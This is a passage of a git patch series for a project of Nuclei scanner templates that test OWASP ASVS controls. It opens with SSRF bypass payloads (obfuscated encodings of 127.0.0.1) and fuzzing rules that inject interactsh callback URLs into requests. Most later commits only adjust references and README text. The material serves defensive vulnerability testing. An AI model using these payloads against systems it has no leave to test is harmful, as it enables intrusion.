'0000:0000:0000:0000:0000:ffff:127.0.0.1' - - '0000:0000:0000:0000:0000:ffff:7f000001' - - '0177.0.0.01' - - '0177.0.0.1' - - '0177.0.1' - - '0177.0x0.1' - - '0177.1' - - '017700000001' - - '0:0:0:0:0:ffff:7f000001' - - '0x000000007f.0x000000000.0x000000000.0x000000001' - - '0x7f.0.0.1' - - '0x7f.0.1' - - '0x7f.0x0.0.1' - - '0x7f.0x0.0x0.0x1' - - '0x7f.0x0.0x0.1' - - '0x7f.0x0.1' - - '0x7f.1' - - '0x7f000001' - - '127.0.0.01' - - '127.0.0.0x1' - - '127.0.0x0.0x1' - - '127.0x0.0x0.0x1' - - '2130706433' + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + - "{{FQDN}}@{{interactsh-url}}" + - "{{RDN}}@{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: body + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: header + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" stop-at-first-match: true matchers: - - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "{{restricted_path_keyword}}" \ No newline at end of file + - "http" \ No newline at end of file From b9f8dbe49a5f9ff10603f916917d87062ce028e6 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:46:24 +0000 Subject: [PATCH 113/129] Update 12.6.1.yaml --- templates/12.6.1.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index 1e1ce42..13d6802 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -53,4 +53,5 @@ http: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" \ No newline at end of file + - "http" + - "dns" \ No newline at end of file From bb16b2ef1ea536f46a7134922ab93943822316cd Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:50:26 +0330 Subject: [PATCH 114/129] Update 5.1.5.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/5.1.5.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml index 0942052..6c073bd 100644 --- a/templates/5.1.5.yaml +++ b/templates/5.1.5.yaml @@ -9,7 +9,7 @@ info: reference: - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html - https://cwe.mitre.org/data/definitions/601.html - - https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ tags: asvs,5.1.5 From c87ba323bf9cc4461cf8c7e8617a6c9141a8838f Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:51:50 +0330 Subject: [PATCH 115/129] Update 5.2.6.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.2.6.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml index 0158b63..3fcfda5 100644 --- a/templates/dast/5.2.6.yaml +++ b/templates/dast/5.2.6.yaml @@ -10,6 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ tags: asvs,5.2.6 description: | Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. @@ -102,4 +103,4 @@ http: - type: regex part: body regex: - - 'id[\s\S]+interfaces\/' \ No newline at end of file + - 'id[\s\S]+interfaces\/' From 3ef5e1b82e2038962293adc9602e55956a847778 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:55:47 +0330 Subject: [PATCH 116/129] Update 5.2.6.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.2.6.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml index 3fcfda5..48d7186 100644 --- a/templates/dast/5.2.6.yaml +++ b/templates/dast/5.2.6.yaml @@ -10,7 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml - - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ tags: asvs,5.2.6 description: | Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. From fab12ba616d90efafd9f7a255c117b4c6a6d36b2 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:57:18 +0330 Subject: [PATCH 117/129] Update 5.3.3.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.3.3.2.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml index fd92174..55f1434 100644 --- a/templates/dast/5.3.3.2.yaml +++ b/templates/dast/5.3.3.2.yaml @@ -10,6 +10,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ tags: asvs,5.3.3 description: | Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) @@ -53,4 +54,4 @@ http: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" From 8c86190235e44340c818f02dfbabdda86ba1c097 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:57:40 +0330 Subject: [PATCH 118/129] Update 5.3.3.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.3.3.2.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml index 55f1434..a8d0005 100644 --- a/templates/dast/5.3.3.2.yaml +++ b/templates/dast/5.3.3.2.yaml @@ -10,7 +10,6 @@ info: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml - - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ tags: asvs,5.3.3 description: | Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) From 392f4acd12fe360e2ad6dbd9912b8d7415d3af29 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 10:58:28 +0330 Subject: [PATCH 119/129] Update 5.5.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/5.5.2.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml index 353012c..13f7fe5 100644 --- a/templates/dast/5.5.2.yaml +++ b/templates/dast/5.5.2.yaml @@ -9,7 +9,7 @@ info: reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml - - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection tags: asvs,5.5.2 description: | Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. @@ -59,4 +59,4 @@ http: - type: word part: interactsh_protocol words: - - "http" \ No newline at end of file + - "http" From 19fd6434266cd4cd78ce26064d17896d5d9a31ba Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 1 Sep 2024 08:40:08 +0000 Subject: [PATCH 120/129] Add 12.1.1, 12,3,3, 12,6,1, 5.1.5, 5.3.3 Vulnerable pages --- .gitmodules | 2 +- Vulnerable-Pages | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.gitmodules b/.gitmodules index 18feab8..62cddbf 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,4 @@ [submodule "Vulnerable-Pages"] path = Vulnerable-Pages url = https://github.com/Snbig/Vulnerable-Pages - branch = dev + branch = main diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 7457167..9f6162f 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 74571678dbdfb39620454cde42d2054eb2a858db +Subproject commit 9f6162ffc8b63d2a3eee3c8c68612e92ebc6283d From d31b5f31be19710c916c5b71a7234c547f85b6e6 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:11:16 +0330 Subject: [PATCH 121/129] Update 8.2.1.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/8.2.1.yaml | 49 ++------------------------------------------ 1 file changed, 2 insertions(+), 47 deletions(-) diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml index 0ec2564..83002bb 100644 --- a/templates/8.2.1.yaml +++ b/templates/8.2.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V8-2-1 info: name: ASVS 8.2.1 Check author: AmirHossein Raeisi - severity: low + severity: info classification: cwe-id: CWE-525 reference: @@ -16,46 +16,7 @@ info: http: - method: GET path: - - "{{BaseURL}}{{sensitive_path}}" - payloads: - sensitive_path: - - "/" - - "/login" - - "/logout" - - "/register" - - "/dashboard" - - "/profile" - - "/settings" - - "/account" - - "/admin" - - "/user" - - "/users" - - "/search" - - "/messages" - - "/notifications" - - "/help" - - "/support" - - "/contact" - - "/about" - - "/privacy" - - "/terms" - - "/docs" - - "/api" - - "/api/v1" - - "/api/v2" - - "/home" - - "/welcome" - - "/password-reset" - - "/forgot-password" - - "/update-profile" - - "/billing" - - "/invoices" - - "/orders" - - "/cart" - - "/checkout" - - "/confirmation" - - "/history" - - "/activities" + - "{{BaseURL}}" matchers-condition: and stop-at-first-match: true @@ -65,9 +26,3 @@ http: regex: - '(?i)cache-control:.*no-store' negative: true - - - type: status - status: - - 200 - - 301 - - 302 \ No newline at end of file From 45eea9d3897d76aa64f1811fc3eda773081fcfd0 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:16:51 +0330 Subject: [PATCH 122/129] Update 9.1.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/9.1.2.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates/9.1.2.yaml b/templates/9.1.2.yaml index ef748c2..5170641 100644 --- a/templates/9.1.2.yaml +++ b/templates/9.1.2.yaml @@ -9,6 +9,8 @@ info: reference: - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html tags: asvs,9.1.2 description: | Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. @@ -420,4 +422,4 @@ ssl: - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" - "TLS_KRB5_WITH_RC4_128_SHA" - "TLS_RSA_WITH_NULL_SHA" - condition: or \ No newline at end of file + condition: or From 3a3a40b442ab0e9bc25e14bcf47241016af3f6c2 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:18:09 +0330 Subject: [PATCH 123/129] Update 12.3.3.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/dast/12.3.3.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/dast/12.3.3.yaml b/templates/dast/12.3.3.yaml index cd40bb0..2d92495 100644 --- a/templates/dast/12.3.3.yaml +++ b/templates/dast/12.3.3.yaml @@ -9,6 +9,7 @@ info: reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/ tags: asvs,12.3.3 @@ -43,4 +44,4 @@ http: part: interactsh_protocol words: - "http" - - "dns" \ No newline at end of file + - "dns" From d8038b7714f9d75fed30f7af0f06941df5c13899 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 1 Sep 2024 12:19:18 +0330 Subject: [PATCH 124/129] Update 12.6.1.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- templates/12.6.1.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index 13d6802..df170e0 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -11,6 +11,7 @@ info: - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/blind-ssrf.yaml - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ tags: asvs,12.6.1 description: | Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. @@ -54,4 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - "dns" \ No newline at end of file + - "dns" From 8cd61df11afed283326241b8e41328b4adfecfcd Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:41:13 +0330 Subject: [PATCH 125/129] Ajibe --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5c93c84..08d84bb 100644 --- a/README.md +++ b/README.md @@ -32,3 +32,4 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) + From 61061d5fc32c1d64e5eb8997709ec7b7f7a6c00e Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:41:13 +0330 Subject: [PATCH 126/129] Ajibe --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5c93c84..08d84bb 100644 --- a/README.md +++ b/README.md @@ -32,3 +32,4 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) + From e9c7d3395593bdb3559b9e012a0ba85d1aefb7cf Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:47:13 +0330 Subject: [PATCH 127/129] Fixed --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 08d84bb..5c93c84 100644 --- a/README.md +++ b/README.md @@ -32,4 +32,3 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - From 2800ca25ef55df0e2377f474c6d64cf199765afa Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:47:13 +0330 Subject: [PATCH 128/129] Fixed --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 08d84bb..5c93c84 100644 --- a/README.md +++ b/README.md @@ -32,4 +32,3 @@ For detailed information and guidelines about contributing in developing templat The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - From dc4899f6ae1b1b349721edf3a589ad6f8b60b8ea Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 15:56:15 +0330 Subject: [PATCH 129/129] Chore: Fix Late night --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 5c93c84..a51d7a9 100644 --- a/README.md +++ b/README.md @@ -31,4 +31,3 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -